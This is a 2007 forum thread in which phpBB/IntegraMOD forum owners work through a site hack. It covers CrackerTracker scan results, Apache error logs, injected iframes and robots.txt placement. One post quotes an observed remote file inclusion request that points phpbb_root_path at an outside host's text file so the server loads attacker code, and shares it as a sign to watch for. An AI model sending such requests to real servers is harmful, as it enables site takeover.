spelling/spell_Nederlands.php Code in the file is possibly executable from beyond phpBB
stats_mod/content/bars.php SAFE
stats_mod/content/statistical.php SAFE
stats_mod/content/values.php SAFE
stats_mod/includes/admin_functions.php SAFE
stats_mod/includes/constants.php SAFE
stats_mod/includes/template.php Code in the file is possibly executable from beyond phpBB
stats_mod/includes/stat_functions.php SAFE
stats_mod/core.php Code in the file is possibly executable from beyond phpBB
stats_mod/db_cache.php SAFE
stats_mod/functions.php SAFE
sync_postcount.php SAFE
spell_phpbb.php Code in the file is possibly executable from beyond phpBB
staff.php SAFE
statistics.php SAFE
templates/HL2/radio/radio.php Code in the file is possibly executable from beyond phpBB
templates/CS/radio/radio.php Code in the file is possibly executable from beyond phpBB
tour.php SAFE
uacp.php SAFE
tellafriend.php Code in the file is possibly executable from beyond phpBB
viewforum.php SAFE
viewonline.php SAFE
viewtopic.php Code in the file is possibly executable from beyond phpBB
album_allpics.php common.php / pagestart.php not included or included too late
album_avatar.php common.php / pagestart.php not included or included too late
album_download.php common.php / pagestart.php not included or included too late
album_nuffload.php SAFE
album_nuffload_pbar.php common.php / pagestart.php not included or included too late
album_pclzip_lib.php Code in the file is possibly executable from beyond phpBB
album_personal_cat_admin.php common.php / pagestart.php not included or included too late
album_pic_nuffed.php common.php / pagestart.php not included or included too late
cash.php Code in the file is possibly executable from beyond phpBB
ct_login_history.php SAFE
ctracker_login.php SAFE
profile_photo.php SAFE



CrackerTracker Professional v5.0.3 ÂÂÂ © 2004 - 2007 by CBACK.de


Powered by phpBB 2.0.22 ÂÂÂ © 2001, 2005 phpBB Group + IntegraMOD 1.4.1 ÂÂÂ © 2004

PostPosted: Sat Mar 31, 2007 5:50 pm
Author: Leadfoot
k dont know what i did here now but sorry <img> jsut not my day

Re: *&^#@#*& HACKED &^#&^&

PostPosted: Sat Mar 31, 2007 6:10 pm
Author: .QUACK.Major.Pain
I have done that same check several days ago and had many of the same or similiar errors.

Don't understand enough of it, so not touching it. LOL

PostPosted: Sat Mar 31, 2007 6:45 pm
Author: shaythong
Sometimes the ctracker file check thing is like that, on mine too. Even on new install. <img>

It justs checks for stuff and...you know.

PostPosted: Sun Apr 01, 2007 12:31 am
Author: ZacFields
Well unfortunately finding how who did it is something that you'll likely need a little background in security for.

One of the best things to check is your error logs (if you're on a VPS or Dedicated server) because it's unlikely that through the hacking, the hacker didn't run into any errors, and if he did they would be logged in your error log along with his IP address.

Zac

PostPosted: Sun Apr 01, 2007 7:11 am
Author: Leadfoot
Well that would be a great idea except the gameserver is giving us errors upon errors on the website right now so i doubt it will still be there. But I will go check. Thanks

Re: *&^#@#*& HACKED &^#&^&

PostPosted: Sun Apr 01, 2007 8:09 am
Author: .QUACK.Major.Pain
We're the same, we run 3 sites and 1 America's army game on our server. 2 sites are used minimum to nil, the other site and game are very active. We get an average of 3-4 errors an hour sometimes more. It's a long list LOL

Most are errors of someone trying to access files that don't and never existed. This makes me think it's a hack trying to actually hit an existing file.

[Sun Apr 1 09:39:14 2007] [error] [client 69.128.186.153] File does not exist: /home/k1jon/public_html/404.shtml
[Sun Apr 1 09:39:14 2007] [error] [client 69.128.186.153] File does not exist: /home/k1jon/public_html/favicon.ico
[Sun Apr 1 09:38:45 2007] [error] [client 66.249.72.173] File does not exist: /home/k1jon/public_html/404.shtml
[Sun Apr 1 09:38:45 2007] [error] [client 66.249.72.173] File does not exist: /home/k1jon/public_html/robots.txt
[Sun Apr 1 09:31:42 2007] [error] [client 74.6.75.44] File does not exist: /home/k1jon/public_html/404.shtml
[Sun Apr 1 09:31:42 2007] [error] [client 74.6.75.44] File does not exist: /home/k1jon/public_html/robots.txt
[Sun Apr 1 07:56:19 2007] [error] [client 74.6.75.44] File does not exist: /home/k1jon/public_html/404.shtml
[Sun Apr 1 07:56:19 2007] [error] [client 74.6.75.44] File does not exist: /home/k1jon/public_html/robots.txt
[Sun Apr 1 07:33:16 2007] [error] [client 74.6.75.33] File does not exist: /home/k1jon/public_html/404.shtml
[Sun Apr 1 07:33:16 2007] [error] [client 74.6.75.33] File does not exist: /home/k1jon/public_html/robots.txt
[Sun Apr 1 05:30:01 2007] [error] [client 74.6.75.44] File does not exist: /home/k1jon/public_html/404.shtml
[Sun Apr 1 05:30:01 2007] [error] [client 74.6.75.44] File does not exist: /home/k1jon/public_html/robots.txt
[Sun Apr 1 03:30:38 2007] [error] [client 74.6.75.44] File does not exist: /home/k1jon/public_html/404.shtml
[Sun Apr 1 03:30:38 2007] [error] [client 74.6.75.44] File does not exist: /home/k1jon/public_html/robots.txt
[Sun Apr 1 03:27:53 2007] [error] [client 67.18.228.4] File does not exist: /home/k1jon/public_html/403.shtml
[Sun Apr 1 01:29:03 2007] [error] [client 64.246.165.170] File does not exist: /home/k1jon/public_html/404.shtml
[Sun Apr 1 01:29:03 2007] [error] [client 64.246.165.170] File does not exist: /home/k1jon/public_html/robots.txt
[Sun Apr 1 00:27:43 2007] [error] [client 71.146.172.196] File does not exist: /home/k1jon/public_html/404.shtml
[Sun Apr 1 00:27:43 2007] [error] [client 71.146.172.196] File does not exist: /home/k1jon/public_html/httpdata/Pictures/Buttons/ExitActive.gif
[Sun Apr 1 00:27:42 2007] [error] [client 71.146.172.196] File does not exist: /home/k1jon/public_html/404.shtml
[Sun Apr 1 00:27:42 2007] [error] [client 71.146.172.196] File does not exist: /home/k1jon/public_html/httpdata/Pictures/Buttons/HomeEnterActive.gif


Above is our latest errors trying to access non existant files.

Unless you guys use these files in your coding and they are looking in the wrong location?
HomeEnterActive.gif
ExitActive.gif
robots.txt
favicon.ico

PostPosted: Sun Apr 01, 2007 9:48 am
Author: ZacFields
robots.txt is attempting to be accessed by the search engine spiders. You can get rid of that error simply by creating a robots.txt file. 74.6.*.* I believe is yahoo's Inktomi bot. If you create a robots.txt file it may speed up your site a little bit, because looking at your logs here it looks like you have a fair bit of search engine traffic. 66.249.*.* is Googlebot.

But yes, get rid of those errors simply by creating a robots.txt file.

The homeenteractive and homeexitactive images, you'de have to take a look at those. Go to your website.com/httpdata/Pictures/Buttons/ExitActive.gif and see what pops up. It may just be an image on your site that isnt' loading up correctly.

However, one thing to note is that it is possible for a hacker to upload bogus images on your site that aren't really images but are .scripts used to hack your site. So if you're completely sure those images shouldn't exist you should get rid of them.

Zac

PostPosted: Sun Apr 01, 2007 11:09 am
Author: genxweb
where you suing phpBB 2.0.22 we where using 2.0.21 and got hacked last week it took us 4 days to get back due to the complexity of 1.4.0 integramod to 1.4.1 If you got any questions give a hollar and I will see if I could help. i work in Network security and when Icontacted my host for the logs to see how the hacker got in they told me they dont track that stuff so I left them and found a new host that takes security seriously.

PostPosted: Sun Apr 01, 2007 12:11 pm
Author: ZacFields
My friend that works in network security who has been helping me out has told me that this is the month for PHP exploits. It's not so much that PHP is more exploitable than there's just more people doing it right now.

The hackers are trying to get back into my site right now as we speak. They're not getting anywhere though. Just running a bunch of get commands that aren't doing anything but slowing the server down a little.

Zac

PostPosted: Sun Apr 01, 2007 12:17 pm
Author: ZacFields
Here is the command i'm getting. If you're getting this when you check apache status they're probably trying your site too. All you need to look for is "borek.txt" because there are many different domains that it's attached to.

GET /includes/functions_portal.php?phpbb_root_path=http://yenzero.com/wp-admin/borek.txt

Zac

Re: *&^#@#*& HACKED &^#&^&

PostPosted: Sun Apr 01, 2007 1:27 pm
Author: .QUACK.Major.Pain
The homeenteractive and homeexitactive images, you'de have to take a look at those. Go to your website.com/httpdata/Pictures/Buttons/ExitActive.gif and see what pops up. It may just be an image on your site that isnt' loading up correctly.

However, one thing to note is that it is possible for a hacker to upload bogus images on your site that aren't really images but are .scripts used to hack your site. So if you're completely sure those images shouldn't exist you should get rid of them.

Zac


I checked those but nothing comes up. As I said, the folders and files are none existant, so I don't understand why they are attempting to access.

PostPosted: Sun Apr 01, 2007 3:03 pm
Author: ZacFields
I want to retract my previous post about the exploit I am getting.

Last week 4 hackers got into my server through an exploit in my 140 site that is within my 141 site's directory. When I noticed they were running requests on that site, I changed the directory name of that forum (it was just an archive forum that nobody ever visits). And apparantly the hackers decided to try to run that exploit on my 141 forum's includes/functions_portal.php file.

However, there is a patch in that file that prevents this exploit from working. So basically what happens is that they're trying the exploit but it's not getting them anywhere because the file is patched.

So I'll say this once and for all, if you're on 141 you are not vulnerable to the exploit that I mentioned above. If they're running this request all it will do bog down your server a little bit and eventually they'll leave (i imagine) .

Zac

PostPosted: Sun Apr 01, 2007 4:49 pm
Author: Leadfoot
"ZacFields";p="23634" wrote:My friend that works in network security who has been helping me out has told me that this is the month for PHP exploits. It's not so much that PHP is more exploitable than there's just more people doing it right now.

The hackers are trying to get back into my site right now as we speak. They're not getting anywhere though. Just running a bunch of get commands that aren't doing anything but slowing the server down a little.

Zac


So how do check your apache status??

I have finally recovered from the hack. But had to manually edit every index.htm and index.html file and remove the iframe as well as from many other ifles.

PostPosted: Sun Apr 01, 2007 5:17 pm
Author: ZacFields
well it all depends on what your hosting is. If you have cpanel/whm there's a link for it in your whm portal. Otherwise you'll have to do it via command line and unfortunately I am just beginning to learn command line

Zac

PostPosted: Mon Apr 02, 2007 9:58 am
Author: Leadfoot
The only link i seem to have on my cpanel is one for apache handlers and thats all.

Re: *&^#@#*& HACKED &^#&^&

PostPosted: Mon Apr 02, 2007 11:21 am
Author: Helter
open your cpanel and go to the "Home" link... in your browser address bar youll see that you are in /index.html
replace "/index.html" with "/indexmanager/index.html" now hit the go button on your browser

PostPosted: Tue Apr 03, 2007 1:37 am
Author: Leadfoot
ya but i see nothning about apache in there.

Re: *&^#@#*& HACKED &^#&^&

PostPosted: Tue Apr 03, 2007 8:17 pm
Author: .QUACK.Major.Pain
Just another question about the robots.txt
I made a file and the errors stopped.
Now is there an error in the files to cause this? Reason I ask, is that my error showed it was trying to access the robots.txt in my root server directory.

/home/k1jon/public_html/robots.txt

But I found the file in the forum directory (file is part of 1.4.1 download):

/home/k1jon/public_html/forum/robots.txt

This would lead me to think that something in the files is incorrect and looking in the wrong place for the file.
I'm not sure if this would be the cause of many of the error pages I have been getting.

Should I copy the /forum/robots.txt files to the now empty /robots.txt file?

It contains a bunch of disallowed stuff.

PostPosted: Tue Apr 03, 2007 8:38 pm
Author: ZacFields
Quack,

The robots.txt file has to be in your root directory. The robots.txt file that you have shown is in your /forum/ directory.

You will want it to be in just your public_html file because this is where the robots will look for the file.

If you need help knowing what to put inside the file, let me know and I can give you a few good ideas.

Zac

Re: *&^#@#*& HACKED &^#&^&

PostPosted: Wed Apr 04, 2007 4:51 am
Author: .QUACK.Major.Pain
This is where it was located when I downloaded 141. It was in the forum folder.

It contains the following:

Disallow: /admin/
Disallow: /attach_mod/
Disallow: /avatar/
Disallow: /backup/
Disallow: /cache/
Disallow: /db/
Disallow: /files/
Disallow: /hl/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mods/
Disallow: /stat_modules/
Disallow: /templates/
Disallow: /xs_mod/
Disallow: /common.php
Disallow: /config.php
Disallow: /glance_config.php
Disallow: /groupcp.php
Disallow: /memberlist.php
Disallow: /mini_cal.php
Disallow: /modcp.php
Disallow: /mycalendar.php
Disallow: /news_insert.php
Disallow: /posting.php
Disallow: /printview.php
Disallow: /privmsg.php
Disallow: /profile.php
Disallow: /ranks.php
Disallow: /search.php
Disallow: /statistics.php
Disallow: /tellafriend.php
Disallow: /viewonline.php


If it should be in the root directory, then the download needs to be updated and file moved. Should it not?

PostPosted: Wed Apr 04, 2007 8:45 am
Author: ZacFields
Quack, there's no way of integrating that into the download because there's no way of knowing where you will put your forums. IntegraMod itself is actually meant to be ran from your root directory as it is a complete website package in itself.

In my website, Integramod is right there in public_html, not in a "forum" directory so for my situation, the robots.txt file was exactly where it needed to be. So it's impossible to plan for something like that.

Zac

PostPosted: Wed Apr 04, 2007 8:57 am
Author: geoff1
Of course you could just set up a redirect in cpanel to throw the bots at the robots.txt in the forums directory (works on my installation anyway! Mad but true!)

Re: *&^#@#*& HACKED &^#&^&

PostPosted: Wed Apr 04, 2007 2:06 pm
Author: Helter
if you install your forum in root (example... http://www.yourdomain.com/ ) then the file structure is correct. If you install to a sub-folder such as http://www.yourdomain.com/forum/ then you need to copy robots.txt to root and update the directories inside the file to reflect the path from root
(example... change "Disallow: /admin/" to "Disallow: /forum/admin/" etc...)

Re: *&^#@#*& HACKED &^#&^&

PostPosted: Wed Apr 04, 2007 2:52 pm
Author: .QUACK.Major.Pain
Perfect...

I'll copy it over and modify the file.

Thx again...

Slowly but surely working out the bugs LOL

PostPosted: Thu Apr 05, 2007 1:05 am
Author: Leadfoot
Ok so let me try to get this straight. By doing this you will disallow bots to roam your site? Now if these are search engine bots would that not limit yhour exposure and growth? Or does it just keep them out of certain places?

Re: *&^#@#*& HACKED &^#&^&

PostPosted: Thu Apr 05, 2007 1:27 am
Author: Helter
There is no harm in letting them read most files as they are the same as everyone elses. Yhe problems can arise when you have a security flaw in one of the files and someone googles for it. There is no reason for bots to read those files anyway and if you have a few of them indexing every file, your server resources can hit the roof

PostPosted: Thu Apr 05, 2007 8:28 am
Author: geoff1
Yep, but the ones that ignore the robots.txt file are a pain! <img> the others are very "cooperative"

Re: *&^#@#*& HACKED &^#&^&

PostPosted: Thu Apr 05, 2007 9:27 am
Author: ZacFields
"HelterSkelter";p="23741" wrote:There is no harm in letting them read most files as they are the same as everyone elses. Yhe problems can arise when you have a security flaw in one of the files and someone googles for it. There is no reason for bots to read those files anyway and if you have a few of them indexing every file, your server resources can hit the roof


I can vouche for what Helter has just said. My site is about 3 years old and is very well established on the search engines. (Trust me, when you have a few PR4 pages on your site, the search engines salivate at the idea of indexing your site)

For the longest time I couldn't get my pageloads under 4 seconds on a VPS with spry (which should deliver at least 2.5 second page loads on average with my traffic) and finally I decided that the search engines (most specifically yahoo's inktomi bot and the googlebot) were hitting my site way too hard and last week I wrote my robots.txt file to disallow all bots on my site. Now (with a few more optimizations that I performed) my portal page loads up in just barely over 1 second.

The problem is that when a search engine opens up a page it uses the same amount of resources as everyone else (essentially) and if you constantly have 7-8 different search engine spiders on your site then that is the same as having 7-8 people on your site, except search engines tend to move faster than most people. they don't stop to read topics they just scan them and move on.

I'm working on re-writing my robots.txt file so that they don't use so much resources but I am loving my new page load times now that there's no spiders on my site <img>

Zac